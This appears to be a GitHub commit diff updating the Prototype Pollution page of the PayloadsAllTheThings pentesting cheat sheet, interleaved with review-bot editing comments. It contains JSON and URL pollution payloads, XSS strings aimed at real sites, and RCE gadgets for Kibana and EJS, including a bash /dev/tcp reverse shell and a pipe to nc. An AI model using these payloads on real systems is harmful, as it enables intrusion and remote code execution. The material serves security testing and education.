mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 17:28:49 +00:00
Merge pull request #686 from swisskyrepo/prototype-pollution
Prototype Pollution Update
This commit is contained in: commit 0f085798c7
@ -9,26 +9,45 @@
* [Labs](#labs)
* [Exploit](#exploit)
* [Examples](#examples)
* [Prototype pollution via JSON input](#prototype-pollution-via-json-input)
* [Prototype pollution payloads](#prototype-pollution-payloads)
* [Manual Testing](#manual-testing)
* [Prototype Pollution via JSON input](#prototype-pollution-via-json-input)
* [Prototype Pollution in URL](#prototype-pollution-in-url)
* [Prototype Pollution Payloads](#prototype-pollution-payloads)
* [Prototype Pollution Gadgets](#prototype-pollution-gadgets)
* [References](#references)


## Tools

* [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder) - Help you find gadget for prototype pollution exploitation

* [yuske/silent-spring](https://github.com/yuske/silent-spring) - Prototype Pollution Leads to Remote Code Execution in Node.js
* [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) - Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages
* [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution) - Prototype Pollution and useful Script Gadgets
* [portswigger/server-side-prototype-pollution](https://github.com/portswigger/server-side-prototype-pollution) - Burp Suite Extension detectiong Prototype Pollution vulnerabilities
* [msrkp/PPScan](https://github.com/msrkp/PPScan)

## Labs

* [YesWeHack Dojo - Prototype Pollution](https://dojo-yeswehack.com/XSS/Training/Prototype-Pollution)
* [PortSwigger - Prototype pollution](https://portswigger.net/web-security/all-labs#prototype-pollution)
* [PortSwigger - Prototype Pollution](https://portswigger.net/web-security/all-labs#prototype-pollution)


## Exploit

In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of `Object.prototype`, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.

```js
var myDog = new Dog();

// Points to the function "Dog"
myDog.constructor;

// Points to the class definition of "Dog"
myDog.constructor.prototype;
myDog.__proto__;
myDog["__proto__"];
```


### Examples

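Review bot: the table of contents added here has no entry for the `### Prototype Pollution Exploitation` section this PR introduces between the URL and Payloads sections, so that section is unreachable from the ToC; add `* [Prototype Pollution Exploitation](#prototype-pollution-exploitation)` after the `Prototype Pollution in URL` entry. In the Tools list, `detectiong` should be `detecting`, and `msrkp/PPScan` is the only entry with no one-line description. In the Exploit snippet, `Dog` is never defined (a `function Dog() {}` line before `new Dog()` would make it runnable), and the comment `// Points to the class definition of "Dog"` is imprecise: `myDog.constructor.prototype`, `myDog.__proto__` and `myDog["__proto__"]` all resolve to the same prototype object, so a single `// All three resolve to Dog.prototype` would describe what the three lines show.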
@ -44,9 +63,21 @@ In JavaScript, prototypes are what allow objects to inherit features from other
```


### Prototype pollution via JSON input
### Manual Testing

* ExpressJS: `{ "__proto__":{"parameterLimit":1}}` + 2 parameters in GET request, at least 1 must be reflected in the response.
* ExpressJS: `{ "__proto__":{"ignoreQueryPrefix":true}}` + `??foo=bar`
* ExpressJS: `{ "__proto__":{"allowDots":true}}` + `?foo.bar=baz`
* Change the padding of a JSON response: `{ "__proto__":{"json spaces":" "}}` + `{"foo":"bar"}`, the server should return `{"foo": "bar"}`
* Modify CORS header responses: `{ "__proto__":{"exposedHeaders":["foo"]}}`, the server should return the header `Access-Control-Expose-Headers`.
* Change the status code: `{ "__proto__":{"status":510}}`


### Prototype Pollution via JSON input

You can access the prototype of any object via the magic property `__proto__`.
The `JSON.parse()` function in JavaScript is used to parse a JSON string and convert it into a JavaScript object. Typically it is a sink function where prototype pollution can happen.

You can access the prototype of any object via the magic property `__proto__`.

```js
{
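Review bot: the `json spaces` check states the server should return `{"foo": "bar"}`, but Express hands that setting to `JSON.stringify` as its space argument, which also inserts line breaks, so the response a tester actually sees is the indented multi-line form; stating the one-line expectation could make a positive result look negative. The `status` item is the only one in the list that names no observable, so spell out that the response status code should change to 510. The three ExpressJS items also never say what the tester is looking at: a sentence noting that these are `qs` and Express settings read through the polluted prototype, and that the observable is a change in how the query string is parsed or reflected, would make the list usable without the linked references. Finally, `### Manual Testing` is followed directly by the list with no introductory line and no blank line after the heading.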
@ -56,8 +87,56 @@ You can access the prototype of any object via the magic property `__proto__`.
}
```

Asynchronous payload for NodeJS.

### Prototype pollution payloads
```js
{
"__proto__": {
"argv0":"node",
"shell":"node",
"NODE_OPTIONS":"--inspect=payload\"\".oastify\"\".com"
}
}
```


### Prototype Pollution in URL

Example of Prototype Pollution payloads found in the wild.

```ps1
https://victim.com/#a=b&__proto__[admin]=1
https://example.com/#__proto__[xxx]=alert(1)
http://server/servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E
https://www.apple.com/shop/buy-watch/apple-watch?__proto__[src]=image&__proto__[onerror]=alert(1)
https://www.apple.com/shop/buy-watch/apple-watch?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)
```


### Prototype Pollution Exploitation

Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary.

* Remote Command Execution: [RCE in Kibana (CVE-2019-7609)](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
```js
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```
* Remote Command Execution: [RCE using EJS gadgets](https://mizu.re/post/ejs-server-side-prototype-pollution-gadgets-to-rce)
```js
{
"__proto__": {
"client": 1,
"escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | nc localhost 4444')"
}
}
```
* Reflected XSS: [Reflected XSS on www.hackerone.com via Wistia embed code - #986386](https://hackerone.com/reports/986386)
* Client-side bypass: [Prototype pollution – and bypassing client-side HTML sanitizers](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
* Deny of Service


### Prototype Pollution Payloads

```js
Object.__proto__["evilProperty"]="evilPayload"
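Review bot: `* Deny of Service` should read `* Denial of Service`, and it is the only impact bullet with no reference or example behind it; link a write-up or drop the item. The sentence `Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary.` reads better as `The impact depends on whether the pollution happens client-side (CSPP) or server-side (SSPP).` The URL list is fenced as `ps1` although it contains plain URLs rather than PowerShell, so an untagged fence avoids misleading highlighting. The `Asynchronous payload for NodeJS.` line that introduces the `NODE_OPTIONS` `--inspect` payload never says what the tester should observe (a DNS or HTTP interaction on the out-of-band host in place of `payload"".oastify"".com`), and the Kibana and EJS payloads embed a hard-coded listener (`192.168.0.136/12345`, `localhost 4444`) copied from the linked research; mark these as values to substitute so they are not pasted verbatim.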
@ -65,14 +144,36 @@ Object.__proto__.evilProperty="evilPayload"
Object.constructor.prototype.evilProperty="evilPayload"
Object.constructor["prototype"]["evilProperty"]="evilPayload"
{"__proto__": {"evilProperty": "evilPayload"}}
{"__proto__.name":"test"}
x[__proto__][abaeead] = abaeead
x.__proto__.edcbcab = edcbcab
__proto__[eedffcb] = eedffcb
__proto__.baaebfc = baaebfc
?__proto__[test]=test
```


### Prototype Pollution Gadgets

A "gadget" in the context of vulnerabilities typically refers to a piece of code or functionality that can be exploited or leveraged during an attack. When we talk about a "prototype pollution gadget," we're referring to a specific code path, function, or feature of an application that is susceptible to or can be exploited through a prototype pollution attack.

Either create your own gadget using part of the source with [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder), or try to use already discovered gadgets [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) / [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution).


## References

* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
* [Prototype Pollution and Where to Find Them - BitK & SakiiR - AUGUST 14, 2023](https://youtu.be/mwpH9DF_RDA)
* [Prototype Pollution - PortSwigger](https://portswigger.net/web-security/prototype-pollution)
* [A Pentester’s Guide to Prototype Pollution Attacks - HARSH BOTHRA - JAN 2, 2023](https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks)
* [A tale of making internet pollution free - Exploiting Client-Side Prototype Pollution in the wild - s1r1us](https://blog.s1r1us.ninja/research/PP)
* [Detecting Server-Side Prototype Pollution - Daniel Thatcher - February 15, 2023](https://www.intruder.io/research/server-side-prototype-pollution)
* [Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - MICHAŁ BENTKOWSKI - October 30, 2019](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
* [NodeJS - __proto__ & prototype Pollution - HackTricks](https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution)
* [Prototype Pollution - PortSwigger](https://portswigger.net/web-security/prototype-pollution)
* [Prototype pollution - Snyk](https://learn.snyk.io/lessons/prototype-pollution/javascript/)
* [NodeJS - __proto__ & prototype Pollution - HackTricks](https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution)
* [Prototype pollution and bypassing client-side HTML sanitizers - MICHAŁ BENTKOWSKI - August 18, 2020](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
* [Prototype Pollution and Where to Find Them - BitK & SakiiR - AUGUST 14, 2023](https://youtu.be/mwpH9DF_RDA)
* [Prototype Pollution Attack in NodeJS - Olivier Arteau](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)
* [Prototype pollution attacks in NodeJS applications - Olivier Arteau - Youtube](https://youtu.be/LUsiFV3dsK8)
* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4)
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution)
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
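Review bot: the payload block is fenced as `js` but mixes JavaScript statements (`Object.__proto__.evilProperty=...`), JSON bodies (`{"__proto__": {...}}`), bracket and dot forms that are not valid JavaScript (`x[__proto__][abaeead] = abaeead`) and a query string (`?__proto__[test]=test`); either split it by context (JS, JSON body, query string) or use an untagged fence, and add a line saying that `abaeead`, `edcbcab`, `eedffcb` and `baaebfc` are arbitrary canary names whose appearance in the response is the detection signal. The Gadgets sentence `Either create your own gadget using part of the source with pp-finder` misdescribes the tool named in the Tools list, which helps find gadgets in the application's source rather than build one; `Either find gadgets in the application's own source with pp-finder, or reuse already discovered gadgets from ...` is accurate. In the References list, `NodeJS - __proto__ & prototype Pollution - HackTricks` appears between the Snyk and Bentkowski entries, out of the alphabetical order the surrounding entries follow; whichever copy of the HackTricks, PortSwigger, YesWeHack and BitK & SakiiR entries survives this change, make sure only one of each remains and sits in order.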